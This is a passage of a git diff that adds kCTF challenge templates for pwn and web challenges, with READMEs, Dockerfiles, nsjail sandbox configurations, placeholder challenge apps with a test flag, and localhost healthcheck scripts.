>&2 + echo "$@" >&2 +} + +function _kctf_log_warn { + echo -n "${_KCTF_COLOR_YELLOW}[W]${_KCTF_COLOR_END} " >&2 + echo "$@" >&2 +} + +function _kctf_log_err { + echo -n "${_KCTF_COLOR_RED}[E]${_KCTF_COLOR_END} " >&2 + echo "$@" >&2 +} + diff --git a/v8ctf/kctf/challenge-templates/pwn/README.md b/v8ctf/kctf/challenge-templates/pwn/README.md new file mode 100644 index 00000000..44415f63 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/README.md @@ -0,0 +1,55 @@ +# Quickstart guide to writing a challenge + +The basic steps when preparing a challenge are: + +* A Docker image is built from the `challenge` directory. For the simplest challenges, replacing `challenge/chal.c` is sufficient. +* Edit `challenge/Dockerfile` to change the commandline or the files you want to include. +* To try the challenge locally, you will need to + * create a a local cluster with `kctf cluster create --type kind --start $configname` + * build the challenge binary with `make -C challenge` + * and then deploy the challenge with `kctf chal start` +* To access the challenge, create a port forward with `kctf chal debug port-forward` and connect to it via `nc localhost PORT` using the printed port. +* Check out `kctf chal ` for more commands. + +## Directory layout + +The following files/directories are available: + +### /challenge.yaml + +`challenge.yaml` is the main configuration file. You can use it to change +settings like the name and namespace of the challenge, the exposed ports, the +proof-of-work difficulty etc. +For documentation on the available fields, you can run `kubectl explain challenge` and +`kubectl explain challenge.spec`. + +### /challenge + +The `challenge` directory contains a Dockerfile that describes the challenge and +any challenge files. This template comes with a Makefile to build the challenge, +which is the recommended way for pwnables if the deployed binary matters, e.g. +if you hand it out as an attachment for ROP gadgets. +If the binary layout doesn't matter, you can build it using an intermediate +container as part of the Dockerfile similar to how the chroot is created. + +### /healthcheck + +The `healthcheck` directory is optional. If you don't want to write a healthcheck, feel free to delete it. However, we strongly recommend that you implement a healthcheck :). + +We provide a basic healthcheck skeleton that uses pwntools to implement the +healthcheck code. The only requirement is that the healthcheck replies to GET +requests to http://$host:45281/healthz with either a success or an error status +code. + +In most cases, you will only have to modify `healthcheck/healthcheck.py`. + +## API contract + +Ensure your setup fulfills the following requirements to ensure it works with kCTF: + +* Verify `kctf_setup` is used as the first command in the CMD instruction of your `challenge/Dockerfile`. +* You can do pretty much whatever you want in the `challenge` directory but: +* We strongly recommend using nsjail in all challenges. While nsjail is already installed, you need to configure it in `challenge/nsjail.cfg`. For more information on nsjail, see the [official website](https://nsjail.dev/). +* Your challenge receives connections on port 1337. The port can be changed in `challenge.yaml`. +* The healthcheck directory is optional. + * If it exists, the image should run a webserver on port 45281 and respond to `/healthz` requests. diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge.yaml b/v8ctf/kctf/challenge-templates/pwn/challenge.yaml new file mode 100644 index 00000000..3815d941 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/challenge.yaml @@ -0,0 +1,12 @@ +apiVersion: kctf.dev/v1 +kind: Challenge +metadata: + name: pwn +spec: + deployed: true + powDifficultySeconds: 0 + network: + public: false + healthcheck: + # TIP: disable the healthcheck during development + enabled: true diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/Dockerfile b/v8ctf/kctf/challenge-templates/pwn/challenge/Dockerfile new file mode 100644 index 00000000..973a386b --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/challenge/Dockerfile @@ -0,0 +1,31 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +FROM ubuntu:20.04 as chroot + +RUN /usr/sbin/useradd --no-create-home -u 1000 user + +COPY flag / +COPY chal /home/user/ + +FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f + +COPY --from=chroot / /chroot + +COPY nsjail.cfg /home/user/ + +CMD kctf_setup && \ + kctf_drop_privs \ + socat \ + TCP-LISTEN:1337,reuseaddr,fork \ + EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /home/user/chal" diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/Makefile b/v8ctf/kctf/challenge-templates/pwn/challenge/Makefile new file mode 100644 index 00000000..455cb5fa --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/challenge/Makefile @@ -0,0 +1,3 @@ +LDFLAGS=-static + +chal: chal.c diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/chal.c b/v8ctf/kctf/challenge-templates/pwn/challenge/chal.c new file mode 100644 index 00000000..808f87bb --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/challenge/chal.c @@ -0,0 +1,6 @@ +#include + +int main(int argc, char *argv[]) { + system("cat /flag"); + return 0; +} diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/flag b/v8ctf/kctf/challenge-templates/pwn/challenge/flag new file mode 100644 index 00000000..9ecc2ebf --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/challenge/flag @@ -0,0 +1 @@ +CTF{TestFlag} \ No newline at end of file diff --git a/v8ctf/kctf/challenge-templates/pwn/challenge/nsjail.cfg b/v8ctf/kctf/challenge-templates/pwn/challenge/nsjail.cfg new file mode 100644 index 00000000..c66b20f9 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/challenge/nsjail.cfg @@ -0,0 +1,51 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# See options available at https://github.com/google/nsjail/blob/master/config.proto + +name: "default-nsjail-configuration" +description: "Default nsjail configuration for pwnable-style CTF task." + +mode: ONCE +uidmap {inside_id: "1000"} +gidmap {inside_id: "1000"} +rlimit_as_type: HARD +rlimit_cpu_type: HARD +rlimit_nofile_type: HARD +rlimit_nproc_type: HARD + +cwd: "/home/user" + +mount: [ + { + src: "/chroot" + dst: "/" + is_bind: true + }, + { + dst: "/tmp" + fstype: "tmpfs" + rw: true + }, + { + dst: "/proc" + fstype: "proc" + rw: true + }, + { + src: "/etc/resolv.conf" + dst: "/etc/resolv.conf" + is_bind: true + } +] diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/Dockerfile b/v8ctf/kctf/challenge-templates/pwn/healthcheck/Dockerfile new file mode 100644 index 00000000..2df56306 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/Dockerfile @@ -0,0 +1,18 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +FROM gcr.io/kctf-docker/healthcheck@sha256:6709709a8cfd6e2d743c86d58398c00ca4eb26befd3b1a0a629ab35f91e98ef0 + +COPY healthcheck_loop.sh healthcheck.py healthz_webserver.py /home/user/ + +CMD kctf_drop_privs /home/user/healthcheck_loop.sh & /home/user/healthz_webserver.py diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/README.md b/v8ctf/kctf/challenge-templates/pwn/healthcheck/README.md new file mode 100644 index 00000000..8dbcd6a8 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/README.md @@ -0,0 +1,14 @@ +# Healthcheck + +kCTF checks the health of challenges by accessing the healthcheck via +http://host:45281/healthz which needs to return either 200 ok or an error +depending on the status of the challenge. + +The default healthcheck consists of: +* a loop that repeatedly calls a python script and writes the status to a file +* a webserver that checks the file and serves /healthz +* the actual healthcheck code using pwntools for convenience + +To modify it, you will likely only have to change the script in healthcheck.py. +You can test if the challenge replies as expected or better add a full example +solution that will try to get the flag from the challenge. diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck.py b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck.py new file mode 100755 index 00000000..e4b2c2c9 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck.py @@ -0,0 +1,36 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import pwnlib.tubes + +def handle_pow(r): + print(r.recvuntil(b'python3 ')) + print(r.recvuntil(b' solve ')) + challenge = r.recvline().decode('ascii').strip() + p = pwnlib.tubes.process.process(['kctf_bypass_pow', challenge]) + solution = p.readall().strip() + r.sendline(solution) + print(r.recvuntil(b'Correct\n')) + +r = pwnlib.tubes.remote.remote('127.0.0.1', 1337) +print(r.recvuntil('== proof-of-work: ')) +if r.recvline().startswith(b'enabled'): + handle_pow(r) + +print(r.recvuntil(b'CTF{')) +print(r.recvuntil(b'}')) + +exit(0) diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck_loop.sh b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck_loop.sh new file mode 100755 index 00000000..acf69158 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthcheck_loop.sh @@ -0,0 +1,32 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +set -Eeuo pipefail + +TIMEOUT=20 +PERIOD=30 + +export TERM=linux +export TERMINFO=/etc/terminfo + +while true; do + echo -n "[$(date)] " + if timeout "${TIMEOUT}" /home/user/healthcheck.py; then + echo 'ok' | tee /tmp/healthz + else + echo -n "$? " + echo 'err' | tee /tmp/healthz + fi + sleep "${PERIOD}" +done diff --git a/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthz_webserver.py b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthz_webserver.py new file mode 100755 index 00000000..62cf0198 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/pwn/healthcheck/healthz_webserver.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import http.server + +class HealthzHandler(http.server.BaseHTTPRequestHandler): + def do_GET(self): + if self.path != '/healthz': + self.send_response(404) + self.send_header("Content-length", "0") + self.end_headers() + return + + content = b'err' + try: + with open('/tmp/healthz', 'rb') as fd: + content = fd.read().strip() + except: + pass + self.send_response(200 if content == b'ok' else 400) + self.send_header("Content-type", "text/plain") + self.send_header("Content-length", str(len(content))) + self.end_headers() + self.wfile.write(content) + +httpd = http.server.HTTPServer(('', 45281), HealthzHandler) +httpd.serve_forever() diff --git a/v8ctf/kctf/challenge-templates/web/README.md b/v8ctf/kctf/challenge-templates/web/README.md new file mode 100644 index 00000000..a5cf4249 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/README.md @@ -0,0 +1,90 @@ +# Quickstart guide to writing a challenge + +The basic steps when preparing a challenge are: + +* A Docker image is built from the `challenge` directory. For the simplest challenges, replacing `challenge/chal.c` is sufficient. +* Edit `challenge/Dockerfile` to change the commandline or the files you want to include. +* To try the challenge locally, you will need to + * create a local cluster with `kctf cluster create --type kind --start $configname` + * and then deploy the challenge with `kctf chal start` +* To access the challenge, create a port forward with `kctf chal debug port-forward` and connect to it via `nc localhost PORT` using the printed port. +* Check out `kctf chal ` for more commands. + +## Sandboxing + +Sandboxing is only necessary for challenges that give players RCE-type of access. If a challenge does not provide such access, then it is reasonable to just use a normal HTTP server out of the box listening on port 1337, without any additional sandboxing. + +For challenges that give users RCE-level access, it is then necessary to sandbox every player. In order to make that possible, kCTF provides two ways to sandbox a web server: + 1. **CGI-sandbox**: You can configure PHP (or any other CGI) to be sandboxed. + 2. **Proxy sandbox**: You can configure an HTTP server that sandboxes every HTTP request. + +A Proxy sandbox is a bit expensive, it starts an HTTP server on every TCP connection, hence it is a bit slow. A CGI sandbox is cheaper, and it just calls the normal CGI endpoint but with nsjail. + +The template challenge has an example of both (NodeJS running as a proxy, and PHP running as CGI). It is recommended that static resources are served with only Apache, as to save CPU and RAM. This can be accomplished by configuring apache to redirect certain sub-paths to the sandboxed web server, but to serve directly all other paths. + +## Directory layout + +The following files/directories are available: + +### /challenge.yaml + +`challenge.yaml` is the main configuration file. You can use it to change +settings like the name and namespace of the challenge, the exposed ports, the +proof-of-work difficulty etc. +For documentation on the available fields, you can run `kubectl explain challenge` and +`kubectl explain challenge.spec`. + +If you would like to have a shared directory (for sessions, or uploads), you can mount it using: + + +```yaml +spec: + persistentVolumeClaims: + - $PUT_THE_NAME_OF_THE_CHALLENGE_HERE + podTemplate: + template: + spec: + containers: + - name: challenge + volumeMounts: + - name: gcsfuse + subPath: sessions # this this a folder inside volume + mountPath: /mnt/disks/sessions + - name: gcsfuse + subPath: uploads + mountPath: /mnt/disks/uploads + volumes: + - name: gcsfuse + persistentVolumeClaim: + claimName: $PUT_THE_NAME_OF_THE_CHALLENGE_HERE +``` + +This will mount a file across all challenges in that directory. You can test this setup on a remote cluster using the PHP/CGI sandbox. + +### /challenge + +The `challenge` directory contains a Dockerfile that describes the challenge and +any challenge files. You can use the Dockerfile to build your challenge as well +if required. + +### /healthcheck + +The `healthcheck` directory is optional. If you don't want to write a healthcheck, feel free to delete it. However, we strongly recommend that you implement a healthcheck :). + +We provide a basic healthcheck skeleton that uses pwntools to implement the +healthcheck code. The only requirement is that the healthcheck replies to GET +requests to http://$host:45281/healthz with either a success or an error status +code. + +In most cases, you will only have to modify `healthcheck/healthcheck.py`. + +## API contract + +Ensure your setup fulfills the following requirements to ensure it works with kCTF: + +* Verify `kctf_setup` is used as the first command in the CMD instruction of your `challenge/Dockerfile`. +* You can do pretty much whatever you want in the `challenge` directory but: +* We strongly recommend using nsjail in all challenges. While nsjail is already installed, you need to configure it in `challenge/nsjail.cfg`. For more information on nsjail, see the [official website](https://nsjail.dev/). +* Your challenge receives connections on port 1337. The port can be changed in `challenge.yaml`. +* The healthcheck directory is optional. + * If it exists, the image should run a webserver on port 45281 and respond to `/healthz` requests. diff --git a/v8ctf/kctf/challenge-templates/web/challenge.yaml b/v8ctf/kctf/challenge-templates/web/challenge.yaml new file mode 100644 index 00000000..ed731a9c --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge.yaml @@ -0,0 +1,15 @@ +apiVersion: kctf.dev/v1 +kind: Challenge +metadata: + name: apache-others +spec: + deployed: true + powDifficultySeconds: 0 + network: + public: false + ports: + - protocol: "HTTPS" + targetPort: 1337 + healthcheck: + # TIP: disable the healthcheck during development + enabled: true diff --git a/v8ctf/kctf/challenge-templates/web/challenge/Dockerfile b/v8ctf/kctf/challenge-templates/web/challenge/Dockerfile new file mode 100644 index 00000000..309b1818 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/Dockerfile @@ -0,0 +1,75 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +FROM ubuntu:20.04 as chroot + +RUN /usr/sbin/useradd -u 1000 user + +RUN apt-get update \ + && apt-get install -yq --no-install-recommends \ + curl ca-certificates socat gnupg lsb-release software-properties-common php-cgi \ + && rm -rf /var/lib/apt/lists/* + +RUN curl -sSL https://deb.nodesource.com/gpgkey/nodesource.gpg.key | apt-key add - \ + && (echo "deb https://deb.nodesource.com/node_10.x $(lsb_release -s -c) main";\ + echo "deb-src https://deb.nodesource.com/node_10.x $(lsb_release -s -c) main") \ + > /etc/apt/sources.list.d/nodesource.list \ + && add-apt-repository universe \ + && apt-get update \ + && apt-get install -yq --no-install-recommends nodejs socat \ + && rm -rf /var/lib/apt/lists/* + +RUN mkdir -p /mnt/disks/sessions +RUN mkdir -p /mnt/disks/uploads + +VOLUME /mnt/disks/sessions +VOLUME /mnt/disks/uploads + +COPY web-apps /web-apps +COPY web-servers /web-servers + +COPY flag / + +FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f + +RUN apt-get update \ + && DEBIAN_FRONTEND=noninteractive apt-get install -yq --no-install-recommends tzdata apache2 \ + && ln -fs /usr/share/zoneinfo/Europe/Berlin /etc/localtime \ + && dpkg-reconfigure --frontend noninteractive tzdata \ + && rm -rf /var/lib/apt/lists/* + +RUN service apache2 start + +COPY --from=chroot / /chroot + +# For Proxy +RUN ln -s /etc/apache2/mods-available/proxy.load /etc/apache2/mods-enabled/ +RUN ln -s /etc/apache2/mods-available/proxy_http.load /etc/apache2/mods-enabled/ + +# For CGI sandboxing +RUN ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load +RUN ln -s /etc/apache2/mods-available/actions.load /etc/apache2/mods-enabled/actions.load +RUN ln -s /chroot/web-apps /web-apps +COPY cgi-bin /usr/lib/cgi-bin + +COPY apache2-kctf-nsjail.conf /etc/apache2/conf-enabled/ + +COPY web-servers.nsjail.cfg /home/user/web-servers.nsjail.cfg +COPY cgi-bin.nsjail.cfg /home/user/cgi-bin.nsjail.cfg + +VOLUME /var/log/apache2 +VOLUME /var/run/apache2 + +CMD kctf_setup \ + && (kctf_drop_privs nsjail --config /home/user/web-servers.nsjail.cfg --port 8081 -- /web-servers/nodejs.sh &) \ + && bash -c 'source /etc/apache2/envvars && APACHE_RUN_USER=user APACHE_RUN_GROUP=user /usr/sbin/apache2 -D FOREGROUND' diff --git a/v8ctf/kctf/challenge-templates/web/challenge/apache2-kctf-nsjail.conf b/v8ctf/kctf/challenge-templates/web/challenge/apache2-kctf-nsjail.conf new file mode 100644 index 00000000..da12b9c8 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/apache2-kctf-nsjail.conf @@ -0,0 +1,20 @@ +ServerName kctf-nsjail +Listen 1337 +User user + +# This is only necessary for CGI sandboxing + + Options +ExecCGI + Options +FollowSymLinks + Action application/x-nsjail-httpd-php /cgi-bin/nsjail-php-cgi + AddHandler application/x-nsjail-httpd-php php + Require all granted + + + + # For proxy sandboxing use the two lines below + ProxyPreserveHost On + ProxyPass "/nodejs" "http://localhost:8081/" + # For CGI sandboxing use the line below + DocumentRoot "/web-apps/php" + diff --git a/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin.nsjail.cfg b/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin.nsjail.cfg new file mode 100644 index 00000000..09c9a00a --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin.nsjail.cfg @@ -0,0 +1,80 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# See options available at https://github.com/google/nsjail/blob/master/config.proto + +name: "apache2-proxy-nsjail" +description: "Example nsjail configuration for containing a web server." + +mode: ONCE +uidmap {inside_id: "1000"} +gidmap {inside_id: "1000"} +mount_proc: true +keep_env: true +rlimit_as_type: HARD +rlimit_cpu_type: HARD +rlimit_nofile_type: HARD +rlimit_nproc_type: HARD + +mount: [ + { + src: "/chroot" + dst: "/" + is_bind: true + }, + { + src: "/dev" + dst: "/dev" + is_bind: true + }, + { + src: "/dev/null" + dst: "/dev/null" + is_bind: true + }, + { + src: "/etc/resolv.conf" + dst: "/etc/resolv.conf" + is_bind: true + }, + { + dst: "/mnt/disks/sessions" + fstype: "tmpfs" + rw: true + }, + { + src: "/mnt/disks/sessions" + dst: "/mnt/disks/sessions" + is_bind: true + rw: true + mandatory: false + }, + { + dst: "/mnt/disks/uploads" + fstype: "tmpfs" + rw: true + }, + { + src: "/mnt/disks/uploads" + dst: "/mnt/disks/uploads" + is_bind: true + rw: true + mandatory: false + }, + { + dst: "/tmp" + fstype: "tmpfs" + rw: true + } +] diff --git a/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin/nsjail-php-cgi b/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin/nsjail-php-cgi new file mode 100755 index 00000000..b4dc881c --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin/nsjail-php-cgi @@ -0,0 +1,3 @@ +#!/bin/bash + +/usr/bin/nsjail --config /home/user/cgi-bin.nsjail.cfg -- /usr/lib/cgi-bin/php $@ diff --git a/v8ctf/kctf/challenge-templates/web/challenge/flag b/v8ctf/kctf/challenge-templates/web/challenge/flag new file mode 100644 index 00000000..9ecc2ebf --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/flag @@ -0,0 +1 @@ +CTF{TestFlag} \ No newline at end of file diff --git a/v8ctf/kctf/challenge-templates/web/challenge/web-apps/nodejs/app.js b/v8ctf/kctf/challenge-templates/web/challenge/web-apps/nodejs/app.js new file mode 100644 index 00000000..bb0d78fd --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/web-apps/nodejs/app.js @@ -0,0 +1,14 @@ +const http = require('http'); + +const hostname = '127.0.0.1'; +const port = 8080; + +const server = http.createServer((req, res) => { + res.statusCode = 200; + res.setHeader('Content-Type', 'text/plain'); + res.end(req.url.split('').reverse().join('')); +}); + +server.listen(port, hostname, () => { + console.log(`Server running at http://${hostname}:${port}/`); +}); diff --git a/v8ctf/kctf/challenge-templates/web/challenge/web-apps/php/index.php b/v8ctf/kctf/challenge-templates/web/challenge/web-apps/php/index.php new file mode 100755 index 00000000..aab4a4eb --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/web-apps/php/index.php @@ -0,0 +1,27 @@ + +
+
+
+
+
+ + + +
+
+ diff --git a/v8ctf/kctf/challenge-templates/web/challenge/web-servers.nsjail.cfg b/v8ctf/kctf/challenge-templates/web/challenge/web-servers.nsjail.cfg new file mode 100644 index 00000000..f304aec6 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/web-servers.nsjail.cfg @@ -0,0 +1,56 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# See options available at https://github.com/google/nsjail/blob/master/config.proto + +name: "apache2-proxy-nsjail" +description: "Example nsjail configuration for containing a web server." + +mode: LISTEN +uidmap {inside_id: "1000"} +gidmap {inside_id: "1000"} +mount_proc: true +rlimit_as_type: HARD +rlimit_cpu_type: HARD +rlimit_nofile_type: HARD +rlimit_nproc_type: HARD + +mount: [ + { + src: "/chroot" + dst: "/" + is_bind: true + }, + { + src: "/dev" + dst: "/dev" + is_bind: true + }, + { + src: "/dev/null" + dst: "/dev/null" + is_bind: true + rw: true + }, + { + src: "/etc/resolv.conf" + dst: "/etc/resolv.conf" + is_bind: true + }, + { + dst: "/tmp" + fstype: "tmpfs" + rw: true + } +] diff --git a/v8ctf/kctf/challenge-templates/web/challenge/web-servers/nodejs.sh b/v8ctf/kctf/challenge-templates/web/challenge/web-servers/nodejs.sh new file mode 100755 index 00000000..7752f2bf --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/web-servers/nodejs.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Start node web server +(&>/dev/null node /web-apps/nodejs/app.js)& + +# Proxy stdin/stdout to web server +socat - TCP:127.0.0.1:8080,forever diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/Dockerfile b/v8ctf/kctf/challenge-templates/web/healthcheck/Dockerfile new file mode 100644 index 00000000..2df56306 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/healthcheck/Dockerfile @@ -0,0 +1,18 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +FROM gcr.io/kctf-docker/healthcheck@sha256:6709709a8cfd6e2d743c86d58398c00ca4eb26befd3b1a0a629ab35f91e98ef0 + +COPY healthcheck_loop.sh healthcheck.py healthz_webserver.py /home/user/ + +CMD kctf_drop_privs /home/user/healthcheck_loop.sh & /home/user/healthz_webserver.py diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/README.md b/v8ctf/kctf/challenge-templates/web/healthcheck/README.md new file mode 100644 index 00000000..8dbcd6a8 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/healthcheck/README.md @@ -0,0 +1,14 @@ +# Healthcheck + +kCTF checks the health of challenges by accessing the healthcheck via +http://host:45281/healthz which needs to return either 200 ok or an error +depending on the status of the challenge. + +The default healthcheck consists of: +* a loop that repeatedly calls a python script and writes the status to a file +* a webserver that checks the file and serves /healthz +* the actual healthcheck code using pwntools for convenience + +To modify it, you will likely only have to change the script in healthcheck.py. +You can test if the challenge replies as expected or better add a full example +solution that will try to get the flag from the challenge. diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck.py b/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck.py new file mode 100755 index 00000000..edcb09b5 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import pwnlib.util.web + +if b"imanode" in pwnlib.util.web.wget("http://localhost:1337/nodejs?edonami"): + exit(0) + +exit(1) diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck_loop.sh b/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck_loop.sh new file mode 100755 index 00000000..acf69158 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck_loop.sh @@ -0,0 +1,32 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +set -Eeuo pipefail + +TIMEOUT=20 +PERIOD=30 + +export TERM=linux +export TERMINFO=/etc/terminfo + +while true; do + echo -n "[$(date)] " + if timeout "${TIMEOUT}" /home/user/healthcheck.py; then + echo 'ok' | tee /tmp/healthz + else + echo -n "$? " + echo 'err' | tee /tmp/healthz + fi + sleep "${PERIOD}" +done diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/healthz_webserver.py b/v8ctf/kctf/challenge-templates/web/healthcheck/healthz_webserver.py new file mode 100755 index 00000000..62cf0198 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/healthcheck/healthz_webserver.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 